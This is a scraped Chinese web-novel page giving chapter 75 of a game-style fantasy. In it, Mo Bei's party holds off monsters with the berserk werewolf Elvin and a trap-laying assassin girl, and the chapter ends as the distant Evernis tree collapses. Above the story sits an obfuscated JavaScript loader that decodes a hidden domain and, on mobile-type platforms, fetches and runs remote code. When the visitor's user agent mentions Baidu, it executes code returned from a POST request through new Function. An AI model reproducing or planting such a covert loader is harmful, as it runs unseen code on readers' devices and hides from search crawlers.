98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第75章 被孤立了(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

艾尔文留给大部分人的印象,大概就是能坐着就不站着,能躺着就不坐着,从头懒到脚。但就是嘴特别勤快,也就是话痨。

那张嘴哪怕是战斗中也不愿意闲着,因此他在狼人形态下说话的流利程度,应该算得上是出类拔萃了,可见是下足了功夫。

若不是他的尖牙利齿也是重要的攻击手段,浪费了大量练习说话的机会,现在唱个《狼人很忙》应该问题不大。

但莫北听着艾尔文问东问西,还是觉得一个头两个大,你这说话不但大舌头,还撒气漏风啊。。

为了听清艾尔文在说什么,他也没看清迎面打来的是什么,就下意识地举盾格了一下,结果被一颗链枷上的铁刺球绕过盾牌,直接抡在脸上,给他气坏了。这都多久没吃这种亏了!

埋怨地瞥了一眼艾尔文,干脆借题发挥道。

“赶紧的别划水了,快用野性狂暴啊!我有点招架不住了啊!你看我这嘴肿的!”

艾尔文显得有些不太情愿,他又不是新手菜鸟,现在战斗压力根本就不大好么。

“我进入狂暴状态就说不了话了啊。。”

哦是吗,那真是谢天谢地。莫北撇了撇嘴,他自然是知道这一点。

阿卡莉这时偏头对着艾尔文挑了挑眉毛,让艾尔文不由打了个哆嗦,这才一脸被迫营业的不情愿,进入了狂暴状态。

莫北之前听内德说过,艾尔文这倒霉孩子跟阿卡莉住邻村,从小就体验着被红发魔女统治的恐怖,小男孩又贱嗖嗖的,所以没少挨揍。

小孩挨揍了多半就是回家告自己老爹,他老爹一听自家小子让一小丫头片子给揍了,那还得了!赶紧挽起袖子再把自家小子打一顿。

所以阿卡莉在他心中积威甚重。现在阿卡莉当然也不像小时候那样一言不合就打人,但就怕她跟自己切磋啊,狼人形态打不过,熊人形态只能挨揍,根本惹不起。

口不能言的艾尔文终于是将所有的负面情绪都宣泄到了怪物身上,用肢体语言表达着他的不满。

众人看着自己的经验值蹭蹭地涨,都不由地露出了喜色,眼下这种战斗强度,合理分配一下法力消耗,再用体力药剂顶一下,撑到天黑也不是问题啊。

到时候营地的增援将传送站周围的怪物解决,这边的围也就差不多解了,到时候又升级又捡装备,简直美滋滋。

人群中的一名刺客女孩身上白光闪过,脸现兴奋之色,从物品栏中换出一把新的拳刺。之后战斗风格骤变。

人如灵蛇般在怪群穿梭游走,手中拳刺专挑怪物的关节或要害下手。同时在身后留下一个个致命的陷阱,火焰复苏,刃之守卫,雷电网,电能守卫,如百花齐放一般,在自己小队周围吧布下了一圈陷阱死亡地带,表现极为抢眼。

众人当即明白她换上的应该是一把带击中恢复法力的武器,也看见了上面还镶嵌着一颗碎裂的骷髅。

这刺客女孩的强势崛起,使得队伍里的终于有了核心打击力量,她的队友们也是一脸自豪,那件装备自然是每一个小队成员共同努力的成果。

像这样一件装备就能改变整支小队战斗方式的例子十分常见,而这件装备并不一定是什么高攻高防的极品,适合自己专精的技能和小队的需求,就是最极品的。

之前纳维小队获得了属性极强的剃刀之叉,却也只是将之作为备用武器。从莫北手中获得的死亡之铲,等级比剃刀之叉低了不少,却能让法力贫瘠的纳维实力暴涨。

莫北也在心中考虑了一下自己小队将来的配装倾向,现在他们早已不是以前打到什么就用什么的水准,比如他是就舍弃了高属性且格挡更加迅速的新月小盾,选择盾击伤害高了三倍的蓝色尖刺盾牌。

他看到阿卡莉此时战斗的画面非常暴力,死在她的战锤下的怪物,每一具尸体都亟需和谐。

就见阿卡莉一锤就将一只骷髅弓箭手的右肩带一侧肋骨完全打碎,那之骷髅就只能单手拿着弓干瞪眼,完全失去了战斗力。

这让他不由感叹压碎性打击实在是太可怕了,简直完爆钢铁水晶剑的撕开伤口属性。

啥时候自己也能弄一把带压碎性打击的武器啊。

战斗一直持续到了傍晚,正如之前大家所想,传送站那边的情况出现了变化,怪物的包围圈被营地守卫和转职者队伍合力击溃。而高地这边的战局也已经接近尾声,森林中已经不再有新的怪物出现。

众人一鼓作气,很快就将剩余的怪物绞杀得只剩零星几只,再次遁回森林中。

持续大半天的战斗终于结束,众人却有些意犹未尽。

这种情绪在一些差一点就能升级的人身上表现得尤为明显,脸上写满了‘把人弄得不上不下却没了下文’的幽怨。

众人正埋头在怪物尸堆中翻捡着自己的战利品,却听到一阵阵沉闷的雷声自极远处传来。纷纷抬头望去,然后齐齐地张嘴失神,如同一群被雷劈傻了的鸭子。

极远处那火光之中的艾弗尼斯古树,居然正在倒塌!

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间